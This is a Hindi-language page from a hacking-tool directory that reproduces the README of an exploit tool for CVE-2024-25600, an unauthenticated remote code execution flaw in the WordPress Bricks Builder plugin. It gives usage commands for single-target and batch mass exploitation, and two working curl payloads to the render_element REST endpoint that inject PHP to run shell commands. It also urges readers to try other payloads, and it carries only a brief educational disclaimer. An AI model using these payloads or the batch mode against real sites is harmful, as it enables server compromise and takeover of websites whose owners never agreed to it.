Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-25600-Bricks-Builder-plugin-for-WordPress — यह उपकरण WordPress के लिए Bricks Builder प्लगइन में पाई गई CVE-2024-25600 भेद्यता का शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता प्रभावित वेबसाइटों पर अप्रमाणित रिमोट कोड निष्पादन की अनुमति देती है। यह उपकरण nonce प्राप्त करके और मनमाने आदेशों को निष्पादित करने के लिए विशेष रूप से तैयार अनुरोध भेजकर शोषण प्रक्रिया को स्वचालित करता है। | Kitploit
उपकरण/GitHubGitHub/tornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubtornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress

CVE-2024-25600-Bricks-Builder-plugin-for-WordPress

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
912 साल पहलेअभी तक समीक्षित नहीं

विवरण

यह उपकरण WordPress के लिए Bricks Builder प्लगइन में पाई गई CVE-2024-25600 भेद्यता का शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता प्रभावित वेबसाइटों पर अप्रमाणित रिमोट कोड निष्पादन की अनुमति देती है। यह उपकरण nonce प्राप्त करके और मनमाने आदेशों को निष्पादित करने के लिए विशेष रूप से तैयार अनुरोध भेजकर शोषण प्रक्रिया को स्वचालित करता है।

साझा करें

CVE-2024-25600 शोषण उपकरण 🚀

विवरण 📝

यह उपकरण 🛠️ WordPress के लिए Bricks Builder प्लगइन में पाई गई CVE-2024-25600 भेद्यता 🕳️ का शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता प्रभावित वेबसाइटों 💻 पर अप्रमाणित दूरस्थ कोड निष्पादन की अनुमति देती है। यह उपकरण nonce प्राप्त करके और मनमाने आदेशों को निष्पादित करने के लिए विशेष रूप से तैयार अनुरोध भेजकर शोषण प्रक्रिया को स्वचालित करता है।

विशेषताएँ 🌟

  • इंटरैक्टिव मोड: लक्ष्य वेबसाइट के साथ वास्तविक समय में जुड़ें 🕹️।
  • बैच मोड: एक सूची 📋 से कई वेबसाइटों को स्कैन और शोषण करें।
  • कमांड निष्पादन: लक्ष्य सर्वर ⚙️ पर मनमाने आदेश निष्पादित करें।

स्थापना 🛠️

  1. इस रिपॉज़िटरी को अपनी स्थानीय मशीन 🖥️ पर git clone का उपयोग करके क्लोन करें।
  2. क्लोन की गई रिपॉज़िटरी की निर्देशिका में जाएँ।
  3. pip install -r requirements.txt का उपयोग करके आवश्यक Python लाइब्रेरी स्थापित करें।

उपयोग 📖

इंटरैक्टिव मोड 🎮

  1. इंटरैक्टिव मोड प्रारंभ करने के लिए python exploit.py -u <URL> के साथ उपकरण चलाएँ।
  2. लक्ष्य सर्वर पर आदेश भेजने के लिए ऑन-स्क्रीन संकेतों का पालन करें।

बैच मोड 📊

  1. लक्ष्य URL की सूची के साथ एक टेक्स्ट फ़ाइल तैयार करें।
  2. सूचीबद्ध साइटों को स्कैन और शोषण करने के लिए python exploit.py -l <file_path> के साथ उपकरण चलाएँ।

अवधारणा का प्रमाण (PoC) 📝

प्रकटीकरण द्वारा प्रदान किया गया मूल PoC इस प्रकार है:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

अद्यतन: दूसरा PoC (अधिक विश्वसनीय)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

यह संभव है कि अतिरिक्त पेलोड बेहतर परिणाम दे सकते हैं। यदि मेरा शोषण या अवधारणा का प्रमाण आपके लिए काम नहीं करता है, तो मैं आपको अधिक प्रभावी समाधान खोजने के लिए वैकल्पिक पेलोड के साथ प्रयोग करने के लिए प्रोत्साहित करता हूँ।

[HOST] को लक्ष्य वेबसाइट से और [NONCE] को साइट से प्राप्त nonce मान से बदलें।

संदर्भ 📖

CVE-2024-25600 भेद्यता के बारे में अधिक जानकारी के लिए, कृपया Snicco.io पर विस्तृत प्रकटीकरण देखें।

अस्वीकरण ⚠️

इस README में दी गई जानकारी केवल शैक्षिक उद्देश्यों के लिए है। वेबसाइटों या नेटवर्कों में अनधिकृत हैकिंग अवैध और अनैतिक है। 🚫

आभार 🙏

उन सुरक्षा शोधकर्ताओं को धन्यवाद जिन्होंने इस भेद्यता की खोज और रिपोर्ट की, और समुदाय को अपने वेब अनुप्रयोगों को सुरक्षित करने में मदद करने के लिए जानकारी और उपकरण प्रदान किए।

टूल डाउनलोड करें